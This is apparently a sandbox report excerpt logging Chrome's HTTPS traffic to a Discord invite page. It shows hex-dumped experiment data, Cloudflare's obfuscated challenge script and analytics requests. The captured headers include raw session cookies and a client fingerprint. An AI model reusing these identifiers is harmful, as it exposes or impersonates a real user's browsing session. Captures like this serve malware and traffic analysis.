                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 36 2c 30 2c 30 5d 2c 5b 33 39 32 37 31 34 35 37 39 37 2c 30 2c 31 2c 2d 31 2c 33 2c 39 33 37 34 2c 30 2c 30 5d 2c 5b 32 32 34 30 30 39 38 30 32 35 2c 30 2c 31 2c 2d 31 2c 30 2c 38 34 30 39 2c 30 2c 31 5d 2c 5b 34 30 30 38 31 37 34 37 39 35 2c 32 2c 32 2c 2d 31 2c 31 2c 39 36 38 35 2c 30 2c 30 5d 2c 5b 32 35 33 38 35 39 31 30 37 37 2c 30 2c 31 2c 2d 31 2c 36 2c 33 36 34 32 2c 30 2c 30 5d 2c 5b 32 31 38 38 33 33 37 38 30 34 2c 30 2c 31 2c 2d 31 2c 30 2c 35 34 33 34 2c 30 2c 30 5d 2c 5b 32 32 30 37 32 36 31 36 38 37 2c 30 2c 31 2c 2d 31 2c 30 2c 39 34 33 38 2c 30 2c 30 5d 2c 5b 32 38 31 36 35 37 37 36 32 36 2c 30 2c 31 2c 2d 31 2c 32 2c 33 32 33 33 2c 30 2c 30 5d 2c 5b 34 30 33 37 35 36 30 32 32 31 2c 30 2c 31 2c 2d 31 2c 30 2c 32 35 34 31 2c 30 2c 30 5d 2c
                                                                          Data Ascii: 6,0,0],[3927145797,0,1,-1,3,9374,0,0],[2240098025,0,1,-1,0,8409,0,1],[4008174795,2,2,-1,1,9685,0,0],[2538591077,0,1,-1,6,3642,0,0],[2188337804,0,1,-1,0,5434,0,0],[2207261687,0,1,-1,0,9438,0,0],[2816577626,0,1,-1,2,3233,0,0],[4037560221,0,1,-1,0,2541,0,0],
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 50 41 52 54 4e 45 52 45 44 22 2c 22 56 45 52 49 46 49 45 44 22 5d 5d 5d 5d 5d 5d 2c 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 7b 22 62 22 3a 31 2c 22 6b 22 3a 5b 22 37 33 33 35 32 35 34 30 36 32 30 33 37 37 33 30 34 39 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 33 35 37 39 30 38 33 33 30 31 2c 22 32 30 32 31 2d 30 37 5f 74 68 72 65 61 64 73 5f 6f 6e 6c 79 5f 63 68 61 6e 6e 65 6c 22 2c 38 2c 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 38 30 30 30 7d 2c 7b 22 73 22 3a 38 30 30 30 2c 22 65 22 3a 39 30 30 30 7d 2c 7b 22 73 22 3a 39 30 30 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30
                                                                          Data Ascii: 12045,[[1183251248,["PARTNERED","VERIFIED"]]]]]],[[[-1,[{"s":0,"e":10000}]]],[]]],[{"b":1,"k":["733525406203773049"]}],[],null,null,0,0],[3579083301,"2021-07_threads_only_channel",8,[[[[1,[{"s":0,"e":8000},{"s":8000,"e":9000},{"s":9000,"e":10000}]]],[[160
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 36 2c 34 33 36 30 39 33 37 37 39 5d 2c 5b 31 39 38 32 38 30 34 31 32 31 2c 31 30 30 30 30 5d 5d 5d 5d 5d 2c 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 5d 2c 5b 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 47 55 49 4c 44 5f 43 4f 4d 4d 55 4e 49 43 41 54 49 4f 4e 5f 44 49 53 41 42 4c 45 44 5f 47 55 49 4c 44 53 22 2c 22 50 41 52 54 4e 45 52 45 44 22 5d 5d 5d 5d 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 31 31 30 37 35 31 30 32 39 35 2c 22 32 30 32 32 2d 30 31 5f 68 75 62 73 5f 65 6e 67 61 67 65 6d 65 6e 74 5f 65 78 70 65 72 69 6d 65 6e 74 73 22 2c 30 2c 5b 5b
                                                                          Data Ascii: 6,436093779],[1982804121,10000]]]]],[[[-1,[{"s":0,"e":10000}]]],[]]],[],[[[[[1,[{"s":0,"e":10000}]]],[[1604612045,[[1183251248,["GUILD_COMMUNICATION_DISABLED_GUILDS","PARTNERED"]]]]]]]],null,null,0,0],[1107510295,"2022-01_hubs_engagement_experiments",0,[[
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 38 37 34 22 5d 7d 2c 7b 22 62 22 3a 32 2c 22 6b 22 3a 5b 22 31 30 36 34 39 35 39 35 36 30 38 39 30 32 30 34 32 37 31 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 32 34 34 35 35 39 35 34 35 32 2c 6e 75 6c 6c 2c 31 2c 5b 5b 5b 5b 32 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 7b 22 62 22 3a 31 2c 22 6b 22 3a 5b 22 38 33 34 38 34 36 39 35 31 30 36 38 35 33 32 37 35 36 22 2c 22 38 38 30 32 32 35 30 30 36 36 31 35 39 33 32 39 32 38 22 2c 22 38 38 30 32 32 35 30 34 38 31 39 34 30 37 32 35 37 36 22 2c 22 38 38 30 32 32 35 30 39 37 31 36 32 35 38 38 32 34 31 22 2c 22 38 37 32 36 33 31 37 31 30 30 33 32 39 39 30 32 36 38 22 2c 22 38 31 35 33 36 39 31 37 34 30 39 36 34 31 32 36 39 32 22 5d 7d 5d
                                                                          Data Ascii: 874"]},{"b":2,"k":["1064959560890204271"]}],[],null,null,0,0],[2445595452,null,1,[[[[2,[{"s":0,"e":10000}]]],[]]],[{"b":1,"k":["834846951068532756","880225006615932928","880225048194072576","880225097162588241","872631710032990268","815369174096412692"]}]
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 33 39 39 39 35 37 33 34 34 2c 31 5d 2c 5b 31 32 33 38 38 35 38 33 34 31 2c 32 36 5d 5d 5d 5d 5d 2c 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 43 4f 4d 4d 55 4e 49 54 59 22 5d 5d 5d 5d 5d 5d 2c 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 32 39 31 38 34 30 32 32 35 35 2c 5b 5b 33 33 39 39 39 35 37 33 34 34 2c 31 5d 2c 5b 31 32 33 38 38 35 38 33 34 31 2c 32 30 30 5d 5d 5d 5d 5d 2c 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 32 39 31 38 34 30 32 32 35 35 2c 5b 5b 33 33 39 39 39 35 37 33 34 34 2c 32 30 30 5d 2c 5b 31 32 33 38 38 35 38 33 34 31 2c 6e 75 6c
                                                                          Data Ascii: 399957344,1],[1238858341,26]]]]],[[[1,[{"s":0,"e":10000}]]],[[1604612045,[[1183251248,["COMMUNITY"]]]]]],[[[1,[{"s":0,"e":10000}]]],[[2918402255,[[3399957344,1],[1238858341,200]]]]],[[[1,[{"s":0,"e":10000}]]],[[2918402255,[[3399957344,200],[1238858341,nul


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          336192.168.2.550072162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC837OUTGET /cdn-cgi/challenge-platform/h/b/scripts/jsd/56d3063b/main.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:22 UTC718INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 63 6f 6e 74 65 6e 74 2d 74 79 70 65 2d 6f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 76 61 72 79 3a 20 61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 0d 0a 52 65 70 6f 72 74 2d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascript; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-content-type-options: nosniffcache-control: max-age=14400, publicvary: accept-encodingReport-
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 31 63 39 36 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 62 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 52 2c 67 2c 68 2c 69 2c 6a 2c 77 29 7b 52 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 51 2c 66 2c 79 29 7b 66 6f 72 28 51 3d 62 2c 66 3d 64 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 79 3d 2d 70 61 72 73 65 49 6e 74 28 51 28 32 32 34 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 32 35 33 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 32 33 39 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 51 28 32 31 31 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 51 28 31 39 36 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 51 28 31 36 33 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 51 28 31 37 32 29 29 2f 37 29 2b 70 61
                                                                          Data Ascii: 1c96window._cf_chl_opt={cFPWv:'b'};~function(R,g,h,i,j,w){R=b,function(d,e,Q,f,y){for(Q=b,f=d();!![];)try{if(y=-parseInt(Q(224))/1+-parseInt(Q(253))/2+-parseInt(Q(239))/3+parseInt(Q(211))/4+-parseInt(Q(196))/5+parseInt(Q(163))/6*(-parseInt(Q(172))/7)+pa
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 4e 3d 7a 5b 61 35 28 31 37 31 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 61 35 28 32 31 33 29 5d 5b 61 35 28 32 30 30 29 5d 5b 61 35 28 32 34 38 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 61 35 28 32 31 33 29 5d 5b 61 35 28 32 30 30 29 5d 5b 61 35 28 32 34 38 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 61 35 28 32 31 33 29 5d 5b 61 35 28 32 30 30 29 5d 5b 61 35 28 32 34 38 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 61 35 28 32 36 30 29 5d 28 30 29 29 7b 66 6f 72 28 43 3d 30 3b 43 3c 49 3b 4b 3c 3c 3d 31 2c 4c 3d 3d 41 2d 31 3f 28 4c 3d 30 2c 4a 5b 61 35 28 32 33 30 29 5d 28 42 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 43 2b 2b 29 3b
                                                                          Data Ascii: N=z[a5(171)](M),Object[a5(213)][a5(200)][a5(248)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[a5(213)][a5(200)][a5(248)](D,O))F=O;else{if(Object[a5(213)][a5(200)][a5(248)](E,F)){if(256>F[a5(260)](0)){for(C=0;C<I;K<<=1,L==A-1?(L=0,J[a5(230)](B(K)),K=0):L++,C++);
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 61 35 28 32 33 30 29 5d 28 42 28 4b 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 4c 2b 2b 3b 72 65 74 75 72 6e 20 4a 5b 61 35 28 31 37 30 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 7a 2c 61 36 29 7b 72 65 74 75 72 6e 20 61 36 3d 61 33 2c 6e 75 6c 6c 3d 3d 7a 3f 27 27 3a 7a 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 7a 5b 61 36 28 31 39 31 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 41 2c 61 37 29 7b 72 65 74 75 72 6e 20 61 37 3d 61 36 2c 7a 5b 61 37 28 32 36 30 29 5d 28 41 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 7a 2c 41 2c 42 2c 61 38 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 50 2c 4f 29 7b 66 6f 72 28 61 38 3d 61 33 2c 43 3d 5b 5d 2c 44 3d 34 2c 45 3d 34 2c 46 3d 33 2c 47 3d 5b 5d
                                                                          Data Ascii: a5(230)](B(K));break}else L++;return J[a5(170)]('')},'j':function(z,a6){return a6=a3,null==z?'':z==''?null:f.i(z[a6(191)],32768,function(A,a7){return a7=a6,z[a7(260)](A)})},'i':function(z,A,B,a8,C,D,E,F,G,H,I,J,K,L,M,N,P,O){for(a8=a3,C=[],D=4,E=4,F=3,G=[]
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 28 64 29 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 61 30 2c 64 2c 65 2c 66 2c 79 29 7b 69 66 28 28 61 30 3d 52 2c 64 3d 67 5b 61 30 28 31 36 37 29 5d 2c 65 3d 33 36 30 30 2c 64 2e 74 29 26 26 28 66 3d 4d 61 74 68 5b 61 30 28 32 33 34 29 5d 28 2b 61 74 6f 62 28 64 2e 74 29 29 2c 79 3d 4d 61 74 68 5b 61 30 28 32 33 34 29 5d 28 44 61 74 65 5b 61 30 28 32 31 30 29 5d 28 29 2f 31 65 33 29 2c 79 2d 66 3e 65 29 29 72 65 74 75 72 6e 21 5b 5d 3b 72 65 74 75 72 6e 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 64 2c 65 2c 61 31 2c 66 2c 79 29 7b 61 31 3d 52 2c 66 3d 7b 27 77 70 27 3a 77 5b 61 31 28 31 37 34 29 5d 28 4a 53 4f 4e 5b 61 31 28 32 33 37 29 5d 28 65 29 29 2c 27 73 27 3a 61 31 28 32 31 38 29 7d 2c 79 3d 6e 65 77 20 58 4d 4c 48 74
                                                                          Data Ascii: (d));return e}function s(a0,d,e,f,y){if((a0=R,d=g[a0(167)],e=3600,d.t)&&(f=Math[a0(234)](+atob(d.t)),y=Math[a0(234)](Date[a0(210)]()/1e3),y-f>e))return![];return!![]}function u(d,e,a1,f,y){a1=R,f={'wp':w[a1(174)](JSON[a1(237)](e)),'s':a1(218)},y=new XMLHt
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 73 79 71 3b 73 79 6d 62 6f 6c 3b 69 73 4e 61 4e 3b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 66 72 6f 6d 3b 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 3b 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 63 68 61 72 43 6f 64 65 41 74 3b 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3b 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3b 35 34 77 45 79 4a 78 48 3b 53 65 74 3b 6e 61 76 69 67 61 74 6f 72 3b 20 2d 20 3b 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3b 45 72 72 6f 72 20 6f 62 6a 65 63 74 3a 20 3b 5f 63 66 5f 63 68 6c 5f 6f 70 74 3b 6a 6f 69 6e 3b 63 68 61 72 41 74 3b 37 31 37 33 33 39 4a 52 4f 50 66 57 3b 44 50 48 59 4a 57 37 62 56 33 2d 55 42 41 6b 61 73 35 68 5a 67 74 4d 7a 51 6d 6c 54 6a 69 49 34 46 65 30 4c
                                                                          Data Ascii: syq;symbol;isNaN;addEventListener;from;application/x-www-form-urlencoded;getPrototypeOf;charCodeAt;Content-Type;Content-type;54wEyJxH;Set;navigator; - ;__CF$cv$params;Error object: ;_cf_chl_opt;join;charAt;717339JROPfW;DPHYJW7bV3-UBAkas5hZgtMzQmlTjiI4Fe0L
                                                                          2023-12-10 16:45:22 UTC481INData Raw: 6e 28 66 2c 67 2c 68 29 7b 72 65 74 75 72 6e 20 66 3d 66 2d 31 36 31 2c 68 3d 65 5b 66 5d 2c 68 7d 2c 62 28 63 2c 64 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 66 2c 79 2c 61 32 2c 7a 2c 41 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 61 32 3d 52 2c 21 6f 28 2e 30 31 29 29 72 65 74 75 72 6e 21 5b 5d 3b 7a 3d 5b 61 32 28 31 38 31 29 2b 66 2c 61 32 28 31 36 38 29 2b 4a 53 4f 4e 5b 61 32 28 32 33 37 29 5d 28 79 29 5d 5b 61 32 28 31 37 30 29 5d 28 61 32 28 31 36 36 29 29 3b 74 72 79 7b 69 66 28 41 3d 67 5b 61 32 28 31 36 37 29 5d 2c 42 3d 61 32 28 32 33 38 29 2b 67 5b 61 32 28 31 36 39 29 5d 5b 61 32 28 32 30 31 29 5d 2b 61 32 28 32 30 39 29 2b 31 2b 61 32 28 31 38 30 29 2b 41 2e 72 2b 61 32 28 31 39 37 29 2c 43 3d 6e 65 77 20 67 5b 28 61 32 28 32 32 32 29 29 5d
                                                                          Data Ascii: n(f,g,h){return f=f-161,h=e[f],h},b(c,d)}function v(f,y,a2,z,A,B,C,D,E,F){if(a2=R,!o(.01))return![];z=[a2(181)+f,a2(168)+JSON[a2(237)](y)][a2(170)](a2(166));try{if(A=g[a2(167)],B=a2(238)+g[a2(169)][a2(201)]+a2(209)+1+a2(180)+A.r+a2(197),C=new g[(a2(222))]
                                                                          2023-12-10 16:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          337192.168.2.550073162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC1674OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 629
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=AvNavXW7DDCNgmSvKuaF7ETFbJLYZ1_4UsbUhLNw5Xo-1702226721674-0-604800000
                                                                          2023-12-10 16:45:21 UTC629OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 65 78 70 65 72 69 6d 65 6e 74 5f 75 73 65 72 5f 74 72 69 67 67 65 72 65 64 22 2c 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 31 38 33 34 34 39 33 38 36 38 39 34 37 37 30 33 31 37 2e 69 6d 73 33 74 6d 6f 38 75 5a 4b 4c 46 50 47 32 51 34 77 51 43 6c 77 33 57 61 73 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 30 33 39 31 2c 22 6e 61 6d 65 22 3a 22 32 30 32 33 2d 30 39 5f 63 6c 69 65 6e 74 5f 74 68 65 6d 65 5f 63 6f 61 63 68 6d 61 72 6b 5f 72 65 69 6e 74 72 6f 22 2c 22 72 65 76 69 73 69 6f 6e 22 3a 32 2c 22 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 30 2c 22 62 75 63 6b 65 74 22 3a 31 2c 22 6c 6f 63
                                                                          Data Ascii: {"events":[{"type":"experiment_user_triggered","fingerprint":"1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was","properties":{"client_track_timestamp":1702226720391,"name":"2023-09_client_theme_coachmark_reintro","revision":2,"population":0,"bucket":1,"loc
                                                                          2023-12-10 16:45:22 UTC831INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:22 GMTConnection: closevary: Origin, Access-Control-Request-Method, Access-Control-Request-Headersaccess-control-allow-origin: https://discord.comVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          338192.168.2.550074162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC866OUTGET /assets/68291.687557b9b660607399a3.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MuKRNnb87L1y398_4RmJyNjCxq2KEUPnsExQwAzBUyg-1702226721658-0-604800000
                                                                          2023-12-10 16:45:22 UTC1120INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 36 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 35 65 39 62 39 33 31 64 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascriptContent-Length: 17670Connection: closeCF-Ray: 8336f535e9b931dd-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
